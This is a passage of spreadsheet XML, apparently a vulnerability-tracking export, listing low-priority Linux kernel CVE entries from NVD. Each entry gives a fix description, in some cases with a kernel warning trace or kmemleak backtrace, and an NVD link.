The loop iterated only AMDGPU_MAX_MES_PIPES times, leaving entries
uninitialized for multi-XCC GPUs. This causes null pointer dereferences
when accessing arrays indexed by XCC ID &gt;= 2. Extend the loop to cover
all XCCs (AMDGPU_MAX_MES_PIPES * num_xcc), matching other per-XCC
arrays.</t>
        </is>
      </c>
      <c r="T955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93139</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9314</t>
        </is>
      </c>
      <c r="D956" s="5" t="inlineStr"/>
      <c r="E956" s="5" t="inlineStr"/>
      <c r="F956" s="5" t="inlineStr"/>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="inlineStr"/>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q956" s="5" t="inlineStr"/>
      <c r="R956" s="5" t="inlineStr"/>
      <c r="S956" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9314</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93140</t>
        </is>
      </c>
      <c r="D957" s="5" t="inlineStr"/>
      <c r="E957" s="5" t="inlineStr"/>
      <c r="F957" s="5" t="inlineStr"/>
      <c r="G957" s="5" t="inlineStr"/>
      <c r="H957" s="5" t="inlineStr"/>
      <c r="I957" s="5" t="inlineStr"/>
      <c r="J957" s="5" t="inlineStr"/>
      <c r="K957" s="5" t="inlineStr"/>
      <c r="L957" s="5" t="inlineStr"/>
      <c r="M957" s="5" t="inlineStr"/>
      <c r="N957" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O957" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P957" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q957" s="5" t="inlineStr"/>
      <c r="R957" s="5" t="inlineStr"/>
      <c r="S957" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
udf: Mark LVID buffer as uptodate before marking it dirty
When an I/O error occurs while writing the Logical Volume Integrity
Descriptor (LVID) buffer to the block device, the block layer's completion
handler (`end_buffer_write_sync()`) clears the `BH_Uptodate` flag on the
buffer. However, the buffer still contains valid LVID data in memory. If
the filesystem is subsequently remounted read-write or synced,
`udf_open_lvid()` or `udf_sync_fs()` will modify the LVID buffer and call
`mark_buffer_dirty()`. This triggers a spurious
`WARN_ON_ONCE(!buffer_uptodate(bh))` warning in `mark_buffer_dirty()`
because the buffer is not marked uptodate, even though its in-memory
contents are valid and are about to be overwritten.
To prevent this spurious warning, unconditionally set the `BH_Uptodate`
flag before calling `mark_buffer_dirty()` in `udf_open_lvid()` and
`udf_sync_fs()`. This acknowledges that the in-memory buffer is valid and
matches the workaround previously applied to `udf_close_lvid()` in commit
853a0c25baf9 ("udf: Mark LVID buffer as uptodate before marking it dirty").
Extending this workaround ensures consistent behavior across all LVID
updates.
Buffer I/O error on dev loop0, logical block 128, lost sync page write
------------[ cut here ]------------
!buffer_uptodate(bh)
WARNING: fs/buffer.c:1087 at mark_buffer_dirty+0x299/0x410 fs/buffer.c:1087
...
Call Trace:
 &lt;TASK&gt;
 udf_open_lvid+0x369/0x5b0 fs/udf/super.c:2078
 udf_reconfigure+0x336/0x540 fs/udf/super.c:679
 reconfigure_super+0x232/0x8f0 fs/super.c:1080
 vfs_cmd_reconfigure fs/fsopen.c:268 [inline]
 vfs_fsconfig_locked+0x171/0x320 fs/fsopen.c:297
 __do_sys_fsconfig fs/fsopen.c:463 [inline]
 __se_sys_fsconfig+0x6b9/0x810 fs/fsopen.c:350
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93140</t>
        </is>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B958" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93141</t>
        </is>
      </c>
      <c r="D958" s="5" t="inlineStr"/>
      <c r="E958" s="5" t="inlineStr"/>
      <c r="F958" s="5" t="inlineStr"/>
      <c r="G958" s="5" t="inlineStr"/>
      <c r="H958" s="5" t="inlineStr"/>
      <c r="I958" s="5" t="inlineStr"/>
      <c r="J958" s="5" t="inlineStr"/>
      <c r="K958" s="5" t="inlineStr"/>
      <c r="L958" s="5" t="inlineStr"/>
      <c r="M958" s="5" t="inlineStr"/>
      <c r="N958" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O958" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P958" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q958" s="5" t="inlineStr"/>
      <c r="R958" s="5" t="inlineStr"/>
      <c r="S958" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: r8a66597: avoid double free of ep0_req in probe error path
If usb_add_gadget_udc() fails, r8a66597_probe() jumps to err_add_udc
and frees ep0_req, then falls through to clean_up2 where ep0_req is
freed again when it is non-NULL.
Remove the redundant free from err_add_udc and keep the cleanup in
clean_up2 so the request is released exactly once.
Issue found using a prototype static analysis tool
and confirmed by code review.</t>
        </is>
      </c>
      <c r="T958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93141</t>
        </is>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B959" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93142</t>
        </is>
      </c>
      <c r="D959" s="5" t="inlineStr"/>
      <c r="E959" s="5" t="inlineStr"/>
      <c r="F959" s="5" t="inlineStr"/>
      <c r="G959" s="5" t="inlineStr"/>
      <c r="H959" s="5" t="inlineStr"/>
      <c r="I959" s="5" t="inlineStr"/>
      <c r="J959" s="5" t="inlineStr"/>
      <c r="K959" s="5" t="inlineStr"/>
      <c r="L959" s="5" t="inlineStr"/>
      <c r="M959" s="5" t="inlineStr"/>
      <c r="N959" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O959" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P959" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q959" s="5" t="inlineStr"/>
      <c r="R959" s="5" t="inlineStr"/>
      <c r="S959" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal/drivers/rcar: Fix error checking in probe()
This code accidentally calls thermal_zone_device_enable() before checking
whether thermal_zone_device_register_with_trips() failed.  Move the call
until later to avoid an error pointer dereference of "priv-&gt;zone".
The driver works differently depending on if we are using OF thermal or
not.  We use thermal_add_hwmon_sysfs() if we are using OF thermal and
call thermal_zone_device_enable() if not.  We can share same error check
for if either of these fail.
Moving the thermal_zone_device_enable() call is a bit cleaner as well.
The original code used a three step process to cleanup:
1. Call thermal_zone_device_unregister() to cleanup.
2. Set priv-&gt;zone to an error pointer to preserve the error code.
3. Set priv-&gt;zone to NULL to avoid a second call to
   thermal_zone_device_unregister() in the rcar_thermal_remove()
   function.
Now we can just do a direct goto error_unregister and rcar_thermal_remove()
handles the cleanup properly.</t>
        </is>
      </c>
      <c r="T959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93142</t>
        </is>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B960" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93143</t>
        </is>
      </c>
      <c r="D960" s="5" t="inlineStr"/>
      <c r="E960" s="5" t="inlineStr"/>
      <c r="F960" s="5" t="inlineStr"/>
      <c r="G960" s="5" t="inlineStr"/>
      <c r="H960" s="5" t="inlineStr"/>
      <c r="I960" s="5" t="inlineStr"/>
      <c r="J960" s="5" t="inlineStr"/>
      <c r="K960" s="5" t="inlineStr"/>
      <c r="L960" s="5" t="inlineStr"/>
      <c r="M960" s="5" t="inlineStr"/>
      <c r="N960" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O960" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P960" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q960" s="5" t="inlineStr"/>
      <c r="R960" s="5" t="inlineStr"/>
      <c r="S960" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: media: ipu7: fix pm_runtime refcount leak in ipu7_resume()
ipu7_resume() calls pm_runtime_get_sync() before resuming the device.
If the runtime PM resume fails, the usage count remains incremented, but
the error path returns without dropping the reference.
Use pm_runtime_resume_and_get() instead, which balances the usage count
on failure and avoids the leak. Keep returning 0 on error, as resume
callbacks should not propagate failures to the PM core, matching the
behaviour of the ipu6 driver.</t>
        </is>
      </c>
      <c r="T960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93143</t>
        </is>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B961" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93144</t>
        </is>
      </c>
      <c r="D961" s="5" t="inlineStr"/>
      <c r="E961" s="5" t="inlineStr"/>
      <c r="F961" s="5" t="inlineStr"/>
      <c r="G961" s="5" t="inlineStr"/>
      <c r="H961" s="5" t="inlineStr"/>
      <c r="I961" s="5" t="inlineStr"/>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr"/>
      <c r="L961" s="5" t="inlineStr"/>
      <c r="M961" s="5" t="inlineStr"/>
      <c r="N961" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O961" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P961" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q961" s="5" t="inlineStr"/>
      <c r="R961" s="5" t="inlineStr"/>
      <c r="S961" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject writes through untrusted BTF pointers
check_ptr_to_btf_access() lets program-type btf_struct_access callbacks
validate writes before the default BTF access path rejects non-read
accesses. That bypasses the read-only policy for untrusted BTF pointers
created by helpers such as bpf_rdonly_cast().
Reject non-read accesses through PTR_UNTRUSTED BTF pointers at the
common entry point, before the callback branch to handle all cases.</t>
        </is>
      </c>
      <c r="T961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93144</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93145</t>
        </is>
      </c>
      <c r="D962" s="5" t="inlineStr"/>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="inlineStr"/>
      <c r="G962" s="5" t="inlineStr"/>
      <c r="H962" s="5" t="inlineStr"/>
      <c r="I962" s="5" t="inlineStr"/>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr"/>
      <c r="L962" s="5" t="inlineStr"/>
      <c r="M962" s="5" t="inlineStr"/>
      <c r="N962" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O962" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P962" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q962" s="5" t="inlineStr"/>
      <c r="R962" s="5" t="inlineStr"/>
      <c r="S962" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: gdsc: tear down per-domain genpds in gdsc_unregister()
gdsc_unregister() removes the OF provider entry and tears down the
parent/subdomain wiring, but never calls pm_genpd_remove() on the
individual generic_pm_domain structures registered by gdsc_init():
	void gdsc_unregister(struct gdsc_desc *desc)
	{
		struct device *dev = desc-&gt;dev;
		size_t num = desc-&gt;num;
		gdsc_pm_subdomain_remove(desc, num);
		of_genpd_del_provider(dev-&gt;of_node);
	}
That leaves dangling entries on the global gpd_list. After a provider
unbind/rebind cycle (deferred-probe replay during early boot, real
module unload of a clk driver that owns GDSCs, or an OF-overlay tear-
down) the next gdsc_init() will end up trying to re-register a name
that is still in the list and pm_genpd_init() returns -EEXIST.
While we are here, flip the order so the consumer-facing OF provider
entry is the first thing removed -- otherwise a fresh
of_genpd_get_from_provider() call racing with the teardown could
attach to a domain that is mid-removal.
Iterate the scs[] array and pm_genpd_remove() each registered domain
after the subdomain links are torn down. The regulators stay devm-
managed (devm_regulator_get_optional() in gdsc_register()), so the
release happens automatically when the underlying device is unbound;
just the genpd accounting needs to be undone explicitly.</t>
        </is>
      </c>
      <c r="T962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93145</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93146</t>
        </is>
      </c>
      <c r="D963" s="5" t="inlineStr"/>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="inlineStr"/>
      <c r="G963" s="5" t="inlineStr"/>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr"/>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr"/>
      <c r="L963" s="5" t="inlineStr"/>
      <c r="M963" s="5" t="inlineStr"/>
      <c r="N963" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O963" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P963" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q963" s="5" t="inlineStr"/>
      <c r="R963" s="5" t="inlineStr"/>
      <c r="S963" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
time/namespace: Validate nanosecond field in proc_timens_set_offset()
The function validates tv_sec to be within [-KTIME_SEC_MAX, KTIME_SEC_MAX]
but never validates that tv_nsec is within the valid range of
[0, NSEC_PER_SEC-1] before using it in timespec64_add().
timespec64_add() expects both timespec64 structures to have normalized
values with tv_nsec in the range [0, 999999999]. If off-&gt;val.tv_nsec
contains invalid values (negative or &gt;= NSEC_PER_SEC), it could lead to
incorrect calculations or unexpected behavior.
Add validation to ensure tv_nsec is within the valid range before
performing the addition.</t>
        </is>
      </c>
      <c r="T963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93146</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93147</t>
        </is>
      </c>
      <c r="D964" s="5" t="inlineStr"/>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="inlineStr"/>
      <c r="G964" s="5" t="inlineStr"/>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr"/>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr"/>
      <c r="L964" s="5" t="inlineStr"/>
      <c r="M964" s="5" t="inlineStr"/>
      <c r="N964" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O964" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P964" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q964" s="5" t="inlineStr"/>
      <c r="R964" s="5" t="inlineStr"/>
      <c r="S964" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/bpf: Replace ly instruction with llgf
cpu_nr is a 32 bit value and BPF_REG_0 is a 64 bit register, when ly loads
the cpu_nr into BPF_REG_0 it does not zero the upper bits, but llgf does.</t>
        </is>
      </c>
      <c r="T964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93147</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93148</t>
        </is>
      </c>
      <c r="D965" s="5" t="inlineStr"/>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="inlineStr"/>
      <c r="G965" s="5" t="inlineStr"/>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr"/>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr"/>
      <c r="L965" s="5" t="inlineStr"/>
      <c r="M965" s="5" t="inlineStr"/>
      <c r="N965" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O965" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P965" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q965" s="5" t="inlineStr"/>
      <c r="R965" s="5" t="inlineStr"/>
      <c r="S965" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject MEM_ALLOC BTF accesses past object bounds
BTF struct walks relax the struct-size check for accesses through a
trailing flexible array. That is valid for ordinary BTF type walking, but
PTR_TO_BTF_ID | MEM_ALLOC values point to objects allocated with the static
BTF type size.
When walking a MEM_ALLOC object, reject the access before applying the
flexible-array relaxation if the access range extends past the struct size.
Apply the same policy to struct ID matching so kfunc and kptr type checks
do not walk past the allocated object bounds either.</t>
        </is>
      </c>
      <c r="T965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93148</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93149</t>
        </is>
      </c>
      <c r="D966" s="5" t="inlineStr"/>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="inlineStr"/>
      <c r="G966" s="5" t="inlineStr"/>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr"/>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr"/>
      <c r="L966" s="5" t="inlineStr"/>
      <c r="M966" s="5" t="inlineStr"/>
      <c r="N966" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O966" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P966" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q966" s="5" t="inlineStr"/>
      <c r="R966" s="5" t="inlineStr"/>
      <c r="S966" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mac80211_hwsim: avoid NULL skb in stop queue drain
mac80211_hwsim_stop() drops any frames left in data-&gt;pending. The loop
currently checks skb_queue_empty() and then dequeues separately.
That split is racy with TX status handling, which can remove a pending
frame under the queue lock. If the last entry is removed after the empty
check, skb_dequeue() returns NULL and the stop path passes that NULL skb
to ieee80211_free_txskb().
Use skb_dequeue() as the loop condition instead. The dequeue result is the
object that stop owns and frees, and a concurrent status completion that
empties the queue simply makes the loop terminate.</t>
        </is>
      </c>
      <c r="T966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93149</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93150</t>
        </is>
      </c>
      <c r="D967" s="5" t="inlineStr"/>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="inlineStr"/>
      <c r="G967" s="5" t="inlineStr"/>
      <c r="H967" s="5" t="inlineStr"/>
      <c r="I967" s="5" t="inlineStr"/>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr"/>
      <c r="L967" s="5" t="inlineStr"/>
      <c r="M967" s="5" t="inlineStr"/>
      <c r="N967" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O967" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P967" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q967" s="5" t="inlineStr"/>
      <c r="R967" s="5" t="inlineStr"/>
      <c r="S967" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cgroup/cpuset: Make nr_deadline_tasks an atomic_t
The nr_deadline_tasks variable in the cpuset structure was introduced by
commit 6c24849f5515 ("sched/cpuset: Keep track of SCHED_DEADLINE task
in cpusets"). It is reported by sashiko [1] that nr_deadline_tasks
can currently be modified by inc_dl_tasks_cs() under rq-&gt;lock and
by cpuset_attach() under cpuset_mutex. So if both updates happen
simultaneously, the nr_deadline_tasks variable can be corrupted leading
to incorrect operations down the road.
Fix that by changing its type to atomic_t so that nr_deadline_tasks
are always atomically updated. This fix patch is a low hanging fruit.
It can handle some of the races between a concurrent sched_setscheduler()
and cpuset_can_attach()/cpuset_attach() calls, but not all of them like
the other issue raised by sashiko [2]. This will be handled hopefully
in a future follow up patch.
[1] https://sashiko.dev/#/patchset/20260626181923.133658-1-longman%40redhat.com
[2] https://sashiko.dev/#/patchset/20260630033344.352702-1-longman%40redhat.com</t>
        </is>
      </c>
      <c r="T967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93150</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93151</t>
        </is>
      </c>
      <c r="D968" s="5" t="inlineStr"/>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="inlineStr"/>
      <c r="G968" s="5" t="inlineStr"/>
      <c r="H968" s="5" t="inlineStr"/>
      <c r="I968" s="5" t="inlineStr"/>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr"/>
      <c r="L968" s="5" t="inlineStr"/>
      <c r="M968" s="5" t="inlineStr"/>
      <c r="N968" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O968" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P968" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q968" s="5" t="inlineStr"/>
      <c r="R968" s="5" t="inlineStr"/>
      <c r="S968" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-rdma: fix response resource leak on queue teardown
When an nvme target with rdma transport is removed while I/Os are in
flight, a response can be posted but its send completion is never
delivered before the connection is torn down. As a result
nvmet_rdma_send_done() and nvmet_rdma_release_rsp() are never called for
the response, and this leaks the allocated RDMA read/write context and
request SGLs.
These leaks are recreated by running blktests nvme/061 with the rdma
transport and the siw driver. Kernel kmemleak feature reports them as
follows:
  unreferenced object 0xffff88812bc490c0 (size 32):
    comm "kworker/2:1H", pid 409, jiffies 4307744490
    backtrace (crc 89afd339):
      __kmalloc_noprof+0x5f9/0x890
      sgl_alloc_order+0x7b/0x380
      nvmet_req_alloc_sgls+0x290/0x4f0 [nvmet]
      nvmet_rdma_map_sgl_keyed+0x241/0x12e0 [nvmet_rdma]
      nvmet_rdma_handle_command+0x73e/0xb80 [nvmet_rdma]
      __ib_process_cq+0x149/0x4c0 [ib_core]
      ib_cq_poll_work+0x49/0x160 [ib_core]
      process_one_work+0x8b2/0x1640
      worker_thread+0x5fd/0xfe0
      kthread+0x367/0x460
      ret_from_fork+0x655/0x9d0
      ret_from_fork_asm+0x1a/0x30
  unreferenced object 0xffff88814bd05e80 (size 64):
    comm "kworker/3:1H", pid 148, jiffies 4295195428
    backtrace (crc e35510cb):
      __kmalloc_noprof+0x5f9/0x890
      rdma_rw_ctx_init+0x333/0x1fa0 [ib_core]
      nvmet_rdma_map_sgl_keyed+0x5c8/0x12e0 [nvmet_rdma]
      nvmet_rdma_handle_command+0x73e/0xb80 [nvmet_rdma]
      __ib_process_cq+0x149/0x4c0 [ib_core]
      ib_cq_poll_work+0x49/0x160 [ib_core]
      process_one_work+0x8b2/0x1640
      worker_thread+0x5fd/0xfe0
      kthread+0x367/0x460
      ret_from_fork+0x655/0x9d0
      ret_from_fork_asm+0x1a/0x30
To avoid the memory leaks, reclaim the memory of the in-flight responses
when the queue QP is torn down. Call nvmet_rdma_free_rsp_resources()
that frees up the RDMA read/write context and the request SGLs of such
responses.</t>
        </is>
      </c>
      <c r="T968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93151</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93152</t>
        </is>
      </c>
      <c r="D969" s="5" t="inlineStr"/>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="inlineStr"/>
      <c r="G969" s="5" t="inlineStr"/>
      <c r="H969" s="5" t="inlineStr"/>
      <c r="I969" s="5" t="inlineStr"/>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr"/>
      <c r="L969" s="5" t="inlineStr"/>
      <c r="M969" s="5" t="inlineStr"/>
      <c r="N969" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O969" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P969" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q969" s="5" t="inlineStr"/>
      <c r="R969" s="5" t="inlineStr"/>
      <c r="S969" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-apple: Use acquire/release for queue enabled state
apple_nvme_init_queue() initializes queue state and then marks the queue
enabled. The interrupt and request paths check enabled before using that
queue state.
